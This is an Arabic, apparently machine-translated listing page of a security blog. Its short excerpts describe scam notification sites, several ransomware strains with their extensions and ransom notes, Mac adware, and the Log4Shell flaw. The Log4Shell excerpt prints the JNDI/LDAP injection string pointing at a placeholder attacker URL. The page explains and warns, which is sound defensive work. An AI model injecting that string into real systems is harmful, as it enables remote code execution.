موقع Profitsurvey24.com

موقع Profitsurvey24.com هو واحد من آلاف الصفحات المحتالة الأخرى التي لا تقدم أي محتوى مفيد. والغرض الوحيد منه هو تحميل محتوى مشكوك فيه أو مخادع وإعادة توجيه زواره إلى مواقع ويب مختلفة مشبوهة أو ربما تكون غير آمنة. نادرًا ما يزور مستخدمو الإنترنت صفحات مثل هذه عن قصد. بدلاً من ذلك ، تتم إعادة توجيههم إليهم من خلال صفحات أخرى عديمة الفائدة مماثلة ، أو عن طريق الإعلانات المتطفلة ، أو عن طريق تطبيق يحتمل أن يكون غير مرغوب فيه (PUA) مثبتًا على أجهزة الكمبيوتر الخاصة بهم. تعتمد طريقة عمل موقع Profitsurvey24.com على عنوان IP الخاص بالزائر. في بعض الحالات ، تعرض الصفحة محتوى مشبوهًا ؛ في حالات أخرى ، يرسل الزوار إلى مواقع ويب أخرى مشبوهة. الهدف الآخر من هذا النوع من مواقع الويب هو خداع المستخدمين للسماح بإشعارات المتصفح من الصفحة. إذا تم تمكين...

نشر على December 16, 2021 في Rogue Websites

Hoffmx Ransomware

Hoffmx عبارة عن قطعة من برامج الفدية تم رصدها مؤخرًا مصممة لتشفير ملفاتك بحيث لا يمكنك الوصول إليها إلا إذا دفعت مبلغ فدية محدد مسبقًا. Hoffmx هو فيروس تشفير نموذجي ، لا يُحدث أسلوبه اختلافًا كبيرًا مقارنة بتهديدات برامج الفدية الشائعة الأخرى الموجودة. تحدث عدوى Hoffmx Ransomware الناجحة عندما يخترق الفيروس نظامك ، ويقوم بتشفير جميع الملفات التي تهمك على طول الطريق - ملفات الوسائط المتعددة أو الملفات النصية أو الصور ، على سبيل المثال لا الحصر. في النهاية ، يكون لكل ملف مصاب لاحقة ".hoffmx" ملحقة بجانب امتداده الحقيقي عبر النمط التالي: . . ملاحظة الفدية - ملف نصي مُسمى "leia_isso" - تظهر بعد ذلك على سطح مكتب الضحية ، وكذلك في كل دليل يحتوي على ملفات مشفرة. تحث المذكرة ، المكتوبة باللغة البرتغالية ، الضحايا على دفع 0،450 ETH (حوالي 200...

نشر على December 16, 2021 في Uncategorized

برنامج Topcipher Ransomware

على غرار الأجزاء الشائعة الأخرى من برامج الفدية المتداولة ، تصيب Topcipher Ransomware أجهزة الكمبيوتر المستهدفة عبر واحد أو أكثر من الثغرات الأمنية ، مما يجعل الوصول إلى بياناتك القيمة غير ممكن بفضل خوارزمية تشفير قوية.Topcipher هو أحدث البرامج الضارة تشفير الملفات، للانضمام إلى سيئة السمعة VoidCrypt الفدية الأسرة. أنت تعلم أنك وقعت تحت قبضة Topcipher عندما ترى جميع ملفاتك تغير أسمائها عبر النمط التالي: <اسم الملف>. [topcipher24@gmail.com] [MJ-GX3965214078] الجزء الغامق هو اللاحقة الملحقة بكل ملف مصاب. ملحوظة! على عكس معظم تهديدات برامج الفدية ، لا يُنشئ برنامج Topcipher مذكرة فدية مفصلة. بدلاً من ذلك ، يقوم بإنشاء ملف نصي صغير يسمى "prvkey * .txt.key" ويحدد موقعه في مجلد ProgramData الخاص بالضحية. على الرغم من أن "prvkey *...

نشر على December 16, 2021 في Uncategorized

تنوع برامج استغلال Log4j للكشف عن نقاط الضعف الشائعة في التطبيقات والخدمات ، ومن المرجح أن تظل المشكلة قائمة

لقطة شاشة تنوع برامج استغلال Log4j للكشف عن نقاط الضعف الشائعة في التطبيقات والخدمات ، ومن المرجح أن تظل المشكلة قائمة

فقط عندما كنت تعتقد أن عام 2021 كان بالفعل سيئًا بما يكفي للأمن السيبراني ، مع كل هجمات الفدية رفيعة المستوى وتسريبات البيانات الضخمة التي حدثت على مدار الاثني عشر شهرًا الماضية ، ظهر استغلال Log4j وتفوق على كل شيء آخر. تشير أحدث التقارير من المنافذ الأمنية إلى أن الطرق البديلة لاستغلال الثغرة الأمنية تتزايد وتتحول ، ومن المحتمل أيضًا أن تطاردنا هذه المشكلة لبعض الوقت. قد يكشف الاختراق عن ثغرات في بعض التطبيقات والخدمات الأكثر شيوعًا على الإنترنت. نقطة ضعف "مثالية 10" تم رصد ثغرة Log4j ، التي تحمل اسم LogShell ، والتي تم تسجيلها باسم CVE-2021-44228 وتحمل درجة خطورة قصوى قدرها 10 ، لأول مرة بواسطة Alibaba في أواخر نوفمبر 2021 وتم استغلالها بشدة منذ ذلك الحين. في جوهره ، إنه خطأ في تنفيذ...

نشر على December 15, 2021 في Computer Security

Luckydatingspot.top

على الرغم من اسمه ، لا علاقة لـ Luckydatingspot.top بالمواعدة. في الواقع ، الغرض الوحيد منه حتى لوجوده هو تقديم محتوى مشكوك فيه لجميع زواره. كما أنه يؤدي أيضًا تكتيكًا شائعًا يعتمد على المتصفح حيث يتم جذب المستخدمين للاشتراك في خدمات إشعارات الدفع بالصفحةبدون دراية أو معرفة. وتجدر الإشارة إلى أن موقع Luckydatingspot.top هو أحدث موقع ينتشر هذا التكتيك. هناك عدد لا يحصى من المواقع الأخرى التي تعمل بنفس الطريقة. فهي تعرض رسائل احتيالية ، وتحت ادعاءات كاذبة ، تحاول إقناع المستخدمين بالنقر فوق الزر "سماح". قد تختلف الرسائل ، لكن بعض أكثر الرسائل شيوعًا تشمل: " انقر فوق السماح للتحقق من أنك لست روبوتًا " الملف جاهز للتنزيل. " " إذا كان 18 عامًا أو أكثر ، فانقر فوق سماح " " انقر فوق السماح لمشاهدة الفيديو " إذا نجحت الصفحة المخادعة ، فستشرع في...

نشر على December 15, 2021 في Browser Hijackers, Rogue Websites

إصلاح الملف

يقدم Repairadvancedintenselythefile.vip محتوى مشكوكًا فيه أو مشكوكًا فيه لأي شخص يهبط على الموقع. كما أنه ينشر تكتيكًا شائعًا يعتمد على المتصفح حيث تحاول هذه الصفحات المخادعة خداع الزائرين للاشتراك في خدمات إشعارات الدفع الخاصة بهم. الهدف بعد ذلك هو إساءة استخدام أذونات المتصفح غير المشروعة لتوليد إيرادات لمشغليها عبر حملة إعلانية متطفلة. عندما يفتح المستخدمون صفحة مضللة ، مثل Repairadvancedintenselythefile.vip ، فقد يتم تقديمهم بواحد من عدة سيناريوهات وهمية مختلفة. قد تشير الرسائل التي تعرضها الصفحة إلى أن الملف جاهز الآن للتنزيل أو أن الفيديو سيصبح قابلاً للوصول. قد يتصرف الموقع أيضًا كما لو كان يجري اختبار CAPTCHA بحثًا عن برامج الروبوت. ومع ذلك ، فإن السيناريو الدقيق لا يهم ، لأن جميع الرسائل ستصر على قيام المستخدم بالنقر فوق الزر...

نشر على December 15, 2021 في Browser Hijackers, Rogue Websites, Uncategorized

سكيلماناجر

تم تصميم PUP آخر (برنامج غير مرغوب فيه) ، SkillManager ، خصيصًا لإخفاء تثبيته عن انتباه المستخدم. الهدف من التطبيق هو التسلل إلى أنظمة Mac الخاصة بالمستخدمين ثم تحقيق الدخل من وجوده من خلال طرق تدخلية مختلفة. تم تجهيز PUP الخاص بإمكانيات كل من برامج الإعلانات المتسللة والمتصفح. أول علامة على تثبيت SkillManager على أجهزة Mac الخاصة بهم والتي سيلاحظها المستخدمون هي العنوان غير المألوف الذي بدأ مستعرض الويب الخاص بهم في فتحهفجأة. سيقوم خاطفو المتصفح مثل SkillManager بتعديل بعض الإعدادات - الصفحة الرئيسية وصفحة علامة التبويب الجديدة ومحرك البحث الافتراضي وما إلى ذلك ، وتعيينهم على عنوان مروج له. عندما يقوم المستخدمون بتشغيل المتصفح المتأثر ، أو فتح علامة تبويب جديدة ، أو بدء بحث عبر شريط عنوان URL ، فسيؤدي ذلك إلى إنشاء حركة مرور اصطناعية...

نشر على December 15, 2021 في Adware, Browser Hijackers, Mac Malware, Potentially Unwanted Programs

Tiontowriting.xyz

سيتم الترحيب بالمستخدمين الذين يصلون إلى Tiontowriting.xyz بمحتوى مشكوك فيه ومشكوك فيه. وسيخضعون أيضًا إلى تكتيك شائع قائم على المتصفح حيث يحاول الموقع المخادع إغرائهم بالاشتراك في خدمات إشعارات الدفع الخاصة بهبدون دراية أو معرفة. اعتمادًا على الموقع الجغرافي للمستخدم ، يمكن أن يتسبب Tiontowriting.xyz أيضًا في عمليات إعادة توجيه غير مرغوب فيها إلى مواقع ويب غير جديرة بالثقة. مثل كل الصفحات الخادعة الأخرى من هذا النوع ، يعتمد Tiontowriting.xyz أيضًا على الرسائل المضللة والتلاعب. قد يتظاهر بأنه يجري اختبار CAPTCHA بحثًا عن برامج الروبوت أو أن المستخدمين سيحصلون على حق الوصول إلى محتوى للبالغين. تتضمن السيناريوهات الشائعة الأخرى التظاهر بأن الملف جاهز الآن للتنزيل أو أن مقطع الفيديو يواجه مشكلات. ومع ذلك،ستحث جميع الرسائل المعروضة المستخدم...

نشر على December 15, 2021 في Browser Hijackers, Rogue Websites

NRCL Ransomware

NRCL Ransomware هو برنامج ضار مصمم خصيصًا لأخذ ملفات المستخدمين كرهائن ثم المطالبة بدفع فدية لاستعادتها. تستخدم تهديدات برامج الفدية عادةً خوارزميات تشفير غير قابلة للكسر للتأكد من أن الملفات التي تؤثر عليها لا يمكن فتحها بدون مفتاح فك التشفير الذي يمتلكه المهاجمون.ومع ذلك ، تشير جوانب معينة من NRCL Ransomware إلى الإصدارات التي تم نشرها حاليًا والتي يتم استخدامها لأغراض الاختبار. نتيجة لذلك ، قد يتعطل المستخدمون المتأثرون دون أي وسيلة لاستعادة بياناتهم. تفاصيل NRCL Ransomware كجزء من عمليات التهديد ، يقوم التهديد بإلحاق ".NRCL" كامتداد جديد لأسماء الملفات المقفلة. كما أنه يسقط ملفًا قابلاً للتنفيذ باسم "NRCL_Decryptor.exe" وملف نصي - "Note.txt" على الجهاز الذي تم اختراقه. يحتوي الملف النصي على نسخة أقصر من مذكرة الفدية التي يتم عرضها...

نشر على December 15, 2021 في Ransomware

Tgipus Ransomware

تم إنشاء Tgipus Ransomware خصيصًا لمنع المستخدمين من الوصول إلى بياناتهم الخاصة. يقوم بذلك عبر خوارزمية تشفير قوية ستقفل الملفات المخزنة على النظام المخترق. ثم يبتز المهاجمون ضحاياهم الذين يرغبون في استعادة ملفاتهم الشخصية أو ملفات العمل. Tgipus قادرة على التأثير على الوثائق والمحفوظات وقواعد البيانات والصور وملفات الصوت والفيديو والمزيد. يقوم Tgipus Ransomware بتمييز الملفات التي يقفلها عن طريق تغيير أسمائها الأصلية. وبشكل أكثر تحديدًا ، يُلحق التهديد ".tgipus" بامتداد ملف جديد. سيتم تسليم مذكرة فدية مع التعليمات للمهاجمين إلى الجهاز المخترق. سيتم وضعه على سطح المكتب كملف نصي تم إنشاؤه حديثًا باسم 'RESTORE_FILES_INFO.txt). نظرة عامة على مذكرة الفدية يتبع المتسللون المسؤولون عن نشر Tgipus Ransomware اتجاه المطالبة بدفع فدية باستخدام عملة...

نشر على December 15, 2021 في Ransomware

Razio Ransomware

تم تعقب متغير جديد لبرامج الفدية ضمن برنامج RaZiO Ransomware. تم التعرف على Razio Ransomware من قبل الباحثين في إنفوسيك على أنهتنتمي إلى عائلة Xorist Ransomware. على الرغم من أن التهديد لا يُظهر أي تحسينات كبيرة ، إلا أنه لا ينبغي التقليل من قدرته التدميرية. لن يكون من الممكن الوصول إلى أي ملفات مشفرة بواسطة التهديد ويمكن اعتبار فك التشفير دون مساعدة من المهاجمين مستحيلًا تقريبًا. أثناء عملية التشفير ، سيقوم التهديد بإلحاق اسم كل ملف متأثر بـ ".RaZiO" كملحق ملف جديد. يضمن التهديد أيضًا أن يرى ضحاياه رسالة الفدية من المهاجمين من خلال تسليمها في ثلاثة أشكال مختلفة - كخلفية سطح مكتب جديدة ، في نافذة منبثقة ، وداخل ملف نصي باسم 'HOW TO DECRYPT FILES.txt. " تفاصيل مذكرة الفدية النص في الأماكن الثلاثة متطابق. يُعلم المستخدمين المتأثرين أنه...

نشر على December 15, 2021 في Ransomware

ضعف Log4Shell

في 10 ديسمبر 2021 ، تم إصدار ثغرة أمنية حرجة في منصة التسجيل المستندة إلى Java Apache Log4jعلانية. تم تتبع الثغرة الأمنية باعتبارها CVE-2021-44228 أو Log4Shell ، وتؤثر على إصدارات Log4j من Log4j 2.0-beta9 وحتى 2.14.1. يمكن للجهات الفاعلة في مجال التهديد الاستفادة من الاستغلال لإنشاء وصول غير مصدق عن بُعد أو تنفيذ تعليمات برمجية أو إرسال تهديدات من البرامج الضارة أو جمع المعلومات. يتم تعيين حالة حرجة للثغرة الأمنية حيث يتم استخدام Log4j على نطاق واسع بواسطة تطبيقات المؤسسة والخدمات السحابية. تفاصيل Log4Shell الفنية يبدأ الاستغلال مع قيام الفاعل بتغيير وكيل مستخدم متصفح الويب الخاص به. ثم يزورون موقعًا أو يبحثون عن سلسلة معينة موجودة على مواقع الويب بالتنسيق: $ {jndi: ldap: // [attacker_URL]} نتيجة لذلك ، ستتم إضافة السلسلة إلى سجلات...

نشر على December 15, 2021 في Vulnerability

BLOCK Ransomware

يعد BLOCK Ransomware تهديدًا آخر ينتمي إلى عائلة البرامج الضارة Xorist. لا يُظهر سلوك التهديد أي انحرافات كبيرة عن متغيرات Xorist الأخرى.ومع ذلك ، يبدو أن مجرمي الإنترنت المسؤولين عن إطلاق برنامج BLOCK Ransomware يستهدفون المستخدمين الناطقين بالروسية في الغالب. الملف الذي يحتوي على مذكرة فدية التهديد باسم "КАК РАСШИФРОВАТЬ ФАЙЛЫ.txt" والتعليمات الواردة من المتسللين باللغة الروسية بالكامل دون أي ترجمة إلى لغات أخرى. برنامج BLOCK Ransomware قادر على تشفير عدد كبير من أنواع الملفات مما يضمن جعل معظم بيانات الضحية المخزنة على النظام المخترق غير قابلة للاستخدام. كجزء من العملية ، سيقوم التهديد أيضًا بإلحاق اسم كل ملف مقفل بامتداد ".BLOCK". وتجدر الإشارة إلى أن هذا ليس التهديد الأول لاستخدام كتلة الكلمات كوسيلة لتمييز الملفات المشفرة. هناك...

نشر على December 15, 2021 في Ransomware

التقرير الأسبوعي لتنبيهات الأمان من البرامج الضارة للفترة من 5 كانون الأول (ديسمبر) إلى 11 كانون الأول (ديسمبر) 2021

لقطة شاشة التقرير الأسبوعي لتنبيهات الأمان من البرامج الضارة للفترة من 5 كانون الأول (ديسمبر) إلى 11 كانون الأول (ديسمبر) 2021

هذا الأسبوع ، سلط فريق البحث عن البرامج الضارة SpyHunter الضوء على تقرير أسبوعي عن تهديدات البرامج الضارة الشائعة والحرجة التي تؤثر حاليًا على أجهزة الكمبيوتر في جميع أنحاء العالم. ألقِ نظرة على تقرير هذا الأسبوع وكن متقدمًا على تهديدات البرامج الضارة الشائعة! هذا الأسبوع في فيديو البرامج الضارة تناقش هذه الحلقة الموضوعات التالية: كيف يجب على مستخدمي الكمبيوتر الحذر من النوافذ المنبثقة Presenoker التي تسببها تهديدات البرامج الإعلانية ، و Guce.advertising.com التي تعيد توجيه المستخدمين إلى مواقع ويب غير موثوق بها تحتوي على إعلانات دعائية ، وموقع Typiccor.com الذي قد يخدع مستخدمي الكمبيوتر السماح بدفع الإخطارات غير المرغوب فيها والتي يحتمل أن تكون خطرة....

نشر على December 15, 2021 في Announcements

Wuxia Ransomware

تم تعقب تهديد البرامج الضارة مثل Wuxia Ransomware بواسطة باحثو إنفوسيك. ربط تحليل الكود الأساسي للتهديده بعائلة VoidCrypt Ransomware. سيجد ضحايا Wuxia أنفسهم غير قادرين على الوصول إلى جميع الملفات المخزنة على الجهاز المخترق تقريبًا. في الواقع ، يدير التهديد روتين تشفير قويًا لجعل مجموعة واسعة من أنواع الملفات غير قابلة للاستخدام. هدف المتسللين هو ابتزاز المستخدمين المتضررين مقابل المال مقابل الوعد بإعادة الملفات المشفرة إلى وضعها الطبيعي. كجزء من عملية التشفير ، ستقوم Wuxia أيضًا بتغيير الأسماء الأصلية للملفات المستهدفةبشكل كبير. يُلحق التهديد معرف الضحية وعنوان بريد إلكتروني وامتداد ملف جديد. عنوان البريد الإلكتروني المستخدم في أسماء الملفات هو "hushange_delbar@outlook.com ، بينما امتداد الملف الجديد هو" .wuxia. " وأخيرًا ، ستسلم مذكرة...

نشر على December 15, 2021 في Ransomware
1 ... 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 ... 48